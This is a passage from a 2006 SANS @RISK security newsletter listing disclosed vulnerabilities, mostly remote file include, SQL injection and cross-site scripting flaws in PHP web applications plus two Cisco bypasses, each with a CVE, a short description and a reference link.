  • Description: THoRCMS is an add-on for phpBB. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "phpbb_root_path" parameter of the "functions_cms.php" script. THoRCMS version 1.3.1 is affected.
  • Ref: http://www.securityfocus.com/bid/18637
  • 06.26.57 - CVE: CVE-2006-3162
  • Platform: Web Application
  • Title: SmartSiteCMS Inc_Foot.PHP Remote File Include
  • Description: SmartSiteCMS is a membership management tool. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "root" parameter of the "include/inc_foot.php" script. SmartSiteCMS versions 1.0 and earlier are vulnerable.
  • Ref: http://www.frsirt.com/english/advisories/2006/2478
  • 06.26.58 - CVE: Not Available
  • Platform: Web Application
  • Title: phpMySms Gateway.PHP Remote File Include
  • Description: phpMySms is a web application designed for sending SMS messages. Insufficient sanitization of the "ROOT_PATH" parameter of the "sms_config/gateway.php" script exposes the application to a remote file include issue. phpMySms version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/18633/info
  • 06.26.59 - CVE: Not Available
  • Platform: Web Application
  • Title: Bee-hive Multiple Remote File Include Vulnerabilities
  • Description: Bee-hive is a web-based content management application. Insufficient sanitization of user-supplied input exposes the application to multiple remote file include issues. Bee-hive version 1.2 is affected.
  • Ref: http://milw0rm.com/exploits/1951
  • 06.26.60 - CVE: CVE-2006-3302
  • Platform: Web Application
  • Title: CBSMS Mambo Module Mod_CBSMS_Messages.PHP Remote File Include
  • Description: CBSMS is an SMS module for Mambo. Mambo is a web-based content management system (CMS) written in PHP. CBSMS is prone to a remote file include vulnerability due to insufficient sanitization of the "mosConfig_absolute_path" parameter of the "mod_cbsms_messages.php" script. CBSMS mod-cbsms version 1.0 is affected.
  • Ref: http://www.milw0rm.com/exploits/1955
  • 06.26.61 - CVE: CVE-2006-3292
  • Platform: Web Application
  • Title: Jaws Search Gadget Multiple Input Validation Vulnerabilities
  • Description: Jaws is a web-based application framework and content management application. It is vulnerable to multiple input validation issues due to insufficient sanitization of user-supplied input to various scripts. Jaws version 0.6.2 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/438434
  • 06.26.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Custom Dating Biz Multiple Input Validation Vulnerabilities
  • Description: Custom Dating Biz is a web-based dating application. It is vulnerable to multiple input validation issues due to insufficient sanitization of user-supplied input to various scripts. Custom Dating Biz version 1.0 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/438195
  • 06.26.63 - CVE: CVE-2006-3306
  • Platform: Web Application
  • Title: bbsengine Multiple Input Validation Vulnerabilities
  • Description: bbsengine is a web-based bulletin board system. Insufficient sanitization of user-supplied input exposes the application to multiple SQL injection and cross-site scripting issues. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18627/info
  • 06.26.64 - CVE: Not Available
  • Platform: Web Application
  • Title: OpenGuestbook Multiple Input Validation Vulnerabilities
  • Description: OpenGuestbook is a guest book application. It is exposed to multiple input validation issues like cross-site scripting and SQL injection due to insufficient sanitization of user-supplied input. OpenGuestbook version 0.5 is affected.
  • Ref: http://www.securityfocus.com/archive/1/438381
  • 06.26.65 - CVE: CVE-2006-3011
  • Platform: Web Application
  • Title: PHP Error_Log Safe_Mode Restriction Bypass
  • Description: PHP is vulnerable to a restriction bypass issue in the shared hosting configuration files. PHP versions 4.4.2 and 5.1.4 are vulnerable.
  • Ref: http://securityreason.com/achievement_securityalert/41
  • 06.26.66 - CVE: Not Available
  • Platform: Web Application
  • Title: CrisoftRicette Cookbook.PHP Remote File Include
  • Description: CrisoftRicette is a recipe management database. It is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "crisoftricette" parameter of the "cookbook.php" script. CrisoftRicette version 1.0 pre15b is affected.
  • Ref: http://www.securityfocus.com/archive/1/438459
  • 06.26.67 - CVE: Not Available
  • Platform: Web Application
  • Title: MF Piadas Admin.PHP Remote File Include
  • Description: MF Piadas is a web-based forum application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "page" parameter of the "admin.php" script. MF Piadas version 1.0 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/438496
  • 06.26.68 - CVE: Not Available
  • Platform: Web Application
  • Title: Zorum Multiple SQL Injection Vulnerabilities
  • Description: Zorum is a web-based forum application. It is exposed to multiple SQL injection issues due to insufficient sanitization of user-supplied input to various parameters of the "index.php" script. PHPOutsourcing Zorum versions 3.5 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/18681/info
  • 06.26.69 - CVE: Not Available
  • Platform: Web Application
  • Title: Pearl For Mambo Module Remote File Include Vulnerabilities
  • Description: Pearl is a module for Mambo. Mambo is a web-based content management system (CMS). It is exposed to multiple remote file include vulnerabilities due to insufficient sanitization of user-supplied input to the "GlobalSettings[templatesDirectory]" parameter of various scripts. Pearl for Mambo versions 1.6 and 1.5 are affected.
  • Ref: http://www.securityfocus.com/bid/18690
  • 06.26.70 - CVE: Not Available
  • Platform: Web Application
  • Title: SmartSiteCMS Multiple Remote File Include
  • Description: SmartSiteCMS is a web-based content management application. Insufficient sanitization of user-supplied input exposes the application to multiple remote file include issues. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/438581
  • 06.26.71 - CVE: CVE-2006-3291
  • Platform: Web Application
  • Title: Cisco Access Point Web Interface Authorization Bypass
  • Description: The Cisco Access Point web-based interface is vulnerable to an authorization bypass issue due to a design error under certain unspecified conditions, resulting in the default security configuration being removed. Cisco Access Points running Cisco IOS Software Release 12.3(8)JA or 12.3(8)JA1 are vulnerable.
  • Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060628-ap.shtml
  • 06.26.72 - CVE: Not Available
  • Platform: Web Application
  • Title: MyBB Multiple Input Validation Vulnerabilities
  • Description: MyBB is a bulletin board application. It is vulnerable to multiple input validation issues due to insufficient sanitization of user-supplied input to various scripts. MyBulletinBoard version 1.1.4 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/18702/info
  • 06.26.73 - CVE: Not Available
  • Platform: Web Application
  • Title: RsGallery2 RSGallery2.PHP Remote File Include
  • Description: RsGallery2 is a gallery plugin for Joomla. It is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "mosConfig_absolute_path" parameter of the "rsgallery2.php" and "rsgallery2.html.php" script. Joomla RsGallery2 version 1.11.2 is affected.
  • Ref: http://www.securityfocus.com/bid/18705
  • 06.26.74 - CVE: Not Available
  • Platform: Web Application
  • Title: MKPortal Index.PHP Directory Traversal
  • Description: MKPortal is a content management system for the vBulletin package. It is prone to a directory traversal vulnerability. This issue affects MKPortal version 1.0.1 Final.
  • Ref: http://www.securityfocus.com/bid/18707
  • 06.26.75 - CVE: CVE-2006-1435
  • Platform: Web Application
  • Title: Pre Shopping Mall Multiple Input Validation Vulnerabilities
  • Description: Pre Shopping Mall is a shopping cart application. It is prone to multiple HTML injection and cross-site scripting vulnerabilities due to insufficient sanitization of user-supplied input to various scripts. Pre Shopping Mall version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/18706
  • 06.26.76 - CVE: Not Available
  • Platform: Web Application
  • Title: CosmicShoppingCart Multiple Input Validation Vulnerabilities
  • Description: CosmicShoppingCart is a web-based e-commerce shopping cart application. Insufficient sanitization of the "query" and "max" parameters of the "search.php" script exposes the application to SQL injection and cross-site scripting issues.
  • Ref: http://www.securityfocus.com/bid/18709/info
  • 06.26.77 - CVE: Not Available
  • Platform: Web Application
  • Title: phpclassifieds.info Multiple Input Validation Vulnerabilities
  • Description: phpclassifieds.info is a web-based classified ad script. It is exposed to multiple input validation vulnerabilities due to insufficient sanitization of user-supplied input. phpclassifieds.info version 0 is affected.
  • Ref: http://www.securityfocus.com/bid/18713
  • 06.26.78 - CVE: Not Available
  • Platform: Web Application
  • Title: PHP/MySQL Classifieds AddAsset1.PHP Multiple HTML Injection Vulnerabilities
  • Description: PHP/MySQL Classifieds is a web-based classifieds application. It is prone to multiple HTML injection vulnerabilities due to insufficient sanitization of user-supplied input to multiple fields of the "AddAsset1.PHP" script.
  • Ref: http://www.securityfocus.com/bid/18717
  • 06.26.79 - CVE: CVE-2006-3226
  • Platform: Network Device
  • Title: Cisco Secure ACS Authentication Bypass
  • Description: Cisco Secure ACS (Access Control Server) is an authentication, authorization, and accounting software package. It is vulnerable to an authentication bypass issue because of an insecure session management feature. Cisco Secure ACS for Windows versions 4.x series are vulnerable.
  • Ref: http://www.cisco.com/warp/public/707/cisco-sr-20060623-acs.shtml

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

The instructor changed the way I, a network engineer, thought about questions.
-Mike Dye, PTG

Securing the Internet of Things - San Francisco

Latest Whitepapers

Building and Maintaining a &quot;Certifiable&quot; Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"This has been a great way to get working knowledge that would have taken years of experience to learn."
- Josh Carlson, Nelnet

"The perfect balance of theory and hands-on experience."
- James D. Perry II, University of Tennessee

"SANS is a great place to enhance your technical and hands-on skills and tools. I thoroughly recommend it."
- Aaron Waugh, Datacom NZ Ltd